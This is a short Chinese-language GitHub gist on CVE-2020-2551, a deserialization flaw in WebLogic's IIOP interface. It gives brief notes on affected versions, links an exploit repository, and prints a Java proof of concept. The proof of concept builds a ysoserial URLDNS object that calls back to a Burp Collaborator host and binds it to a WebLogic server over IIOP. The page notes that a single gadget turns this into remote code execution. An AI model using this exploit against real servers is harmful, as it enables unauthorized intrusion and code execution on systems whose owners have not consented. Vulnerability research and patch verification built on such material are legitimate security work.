Skip to content

Instantly share code, notes, and snippets.

@kaiili

kaiili/cve-2020-2551.md

Last active March 5, 2020 07:41
Show Gist options
  • Save kaiili/b8004060a3e0725e4118cc3a602c7b1f to your computer and use it in GitHub Desktop.
Save kaiili/b8004060a3e0725e4118cc3a602c7b1f to your computer and use it in GitHub Desktop.
Download ZIP
关于 CVE-2020-2551 我知道的一切
Raw
cve-2020-2551.md

定位: 是一个反序列化的入口,只需一个 gaget就能 RCE

影响版本: 和 jdk( jdk7u21) jython () 以及底层库(CommonsCollections) 还有补丁级别有关。并且存在其他 gadget利用的可能。

poc:

10.3.6 exp:

https://github.com/Y4er/CVE-2020-2551

poc :

package com;


import javax.naming.Context;
import javax.naming.InitialContext;
import java.util.Hashtable;

import ysoserial.payloads.URLDNS;


class test {


    public static void main(String[] args) throws Exception {


        URLDNS u = new URLDNS();
        Object o = u.getObject("http://local.4inxs7g4bqg41civtrzp1axjpav0jp.burpcollaborator.net");


        String rhost = "iiop://127.0.0.1:7001";
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put("java.naming.provider.url", rhost);
        Context context = new InitialContext(env);
        context.rebind("k4ii" + System.nanoTime(), o);

    }
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment